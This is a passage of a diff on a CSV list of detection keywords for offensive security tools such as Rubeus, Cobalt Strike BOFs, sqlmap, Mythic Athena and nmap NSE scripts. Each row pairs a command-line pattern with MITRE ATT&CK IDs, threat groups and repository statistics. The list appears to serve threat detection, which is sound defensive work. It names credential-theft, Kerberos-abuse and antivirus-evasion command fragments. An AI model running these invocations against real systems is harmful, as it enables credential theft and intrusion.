and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* --args whoami*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* arp.x64.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"* asktgs * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt /user *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktht /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* asm.py -t * -ln -w resources/*.txt -o *","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "* asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* asreproast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* --asreproast *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --asreproast *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* asreproast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --asreproast *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --asreproast *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --assemblyargs AntiVirus*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --assemblyargs AppLocker*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" -"* Athena.Commands*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* Athena.Models.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* athena.mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"* Athena.Commands*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* Athena.Models.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* athena.mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "* --attack bruteforce*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "* --attack injection*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "* --attack partial_d --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
@@ -145,29 +145,29 @@ "* --authmode ntlm --username * --password *","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "* auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* avred.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"* avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* avred.py 
*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "* awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "* -b *.bin *.bin dump*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" "* BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" -"* --backdoor *","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"* backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* --backdoor *","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"* backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* backupkey* /server:* /file*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* backupkey* /server:* /file*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* bacnet-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* banner.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* base64_encode_shellcode*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "* --basic ""FUZZ:FUZ2Z""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --batch 
--dbs*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --batch --password*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --batch --dbs*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --batch --password*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* beacon.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"* 